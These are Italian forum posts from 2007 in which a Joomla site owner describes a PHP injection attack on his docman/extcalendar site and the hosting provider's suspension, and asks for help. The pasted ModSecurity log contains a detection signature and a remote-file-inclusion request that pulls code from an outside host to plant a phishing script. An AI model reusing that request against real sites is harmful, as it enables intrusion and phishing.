Post

1

Sezione dedicata ai Server / Re: Mi hanno bloccato il servizio di hosting...

« il: 17 Ott 2007, 16:15:46 »

è stato violato solo doc_man...
ma come faccio a saperlo se il modulo che uso è sicuro?
Grazie

2

Sezione dedicata ai Server / Mi hanno bloccato il servizio di hosting...

« il: 16 Ott 2007, 00:59:37 »

Salve a tutti,
vorrei avere qualche info in riguardo.
Purtroppo mi è capitato un php injection attack http://forum.joomla.it/index.php/topic,29900.0.html
Dopo aver fatto tutto quello consigliatomi dopo 2 giorni mi è stato di nuovo attaccato il sito e il gestore dell'hosting me lo ha rigettato. Adesso non so proprio che fare, il gestore non mi vuole più ri-attivare il dominio e mi ha detto di andarmene da un'altra parte.
Sono molto preoccupato, non so come comportarmi. ho deciso di rifare il sito di nuovo da zero, visto che evidentemente non avevo ripulito bene o cmq sono stato subito ri-attaccato.
Adesso vi chiedo qualche consiglio, cosa posso fare?
Io mica ho inserito il phishing sul mio sito, non sono tutelato in alcun modo da attacchi esterni?
Può disabilitarmi il dominio anche se sono passato solo 6 mesi dall'acquisto (il contratto era x 1 anno).
E' il sito di un comitato regionale sportivo, è moltato importante che possa riavere il sito al + presto.
Ma, x caso, anche trasferendo l'hosting e richiedendo il trasferimento di dominio sarei soggetto di nuovo ad attacchi?
Grazie a chiunque sappia darmi qualche consiglio. 

3

Gestione documenti e download / Re: PHP Injection Attack

« il: 10 Ott 2007, 23:17:35 »

Grazie Tantissime Provo Subito!

4

Gestione documenti e download / PHP Injection Attack

« il: 10 Ott 2007, 17:28:04 »

Salve a Tutti,
ho realizzato quanche mese fa un sito con Joomla 1.0.11 e docmanV13-RC2.
Tutto OK fino a qualche giorno fa, fino a quando non è stato + possibile accedere al sito.
Allora ho contattato colui che fornisce il servizio di hosting e mi ha detti che c'è stato un "PHP Injection Attack". 
Questo è quello che ha trovato in ModSecurity di Apache:

---

[Sun Oct 07 20:10:36 2007] [error] [client 193.93.98.197] ModSecurity:
Access
nied with code 501 (phase 2). Pattern match
"(??:\\\\b(?:f(?:tp_(?:nb_)?f?(
e|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(??:encod|writ)e|compress|open
ad)|s(?:ession_start|candir)|read(??:gz)?file|dir)|move_uploaded_file|(?:pr
|bz)open)|\\\\$_(??:pos|ge)t|session))\\\\b|<\\\\?(?!xml))" at
ARGS:S1. [id
50013"] [msg "PHP Injection Attack. Matched signature <<?>"] [severity
"CRITI
"] [hostname "www.xxx.it"] [uri
"/components/com_extcalend
admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://andravarldar.se/cmd?&action
=save&chdir=/home/xxx/components/com_docman/&file=bmo.p
hp"] [unique_id "DXl7NUUpok8AAF3IJu0AAAAG"]

----

Questa è la directory dove è stato caricato il phishing:

/home/xxx/components/com_docman/

Adesso però sono abbastanza preoccupato xkè mi ha detto che devo ripulire il sito, altrimenti lo rigetta.
Ho cercato con google ma non ho trovato niente, mi ha detto che devo risolvere il bug, ma non cosa fare se non altro che eliminare lo script di phishing inserito che è nominato bmo.php e bmo.html.

Grazie a chiunque sappia aiutarmi!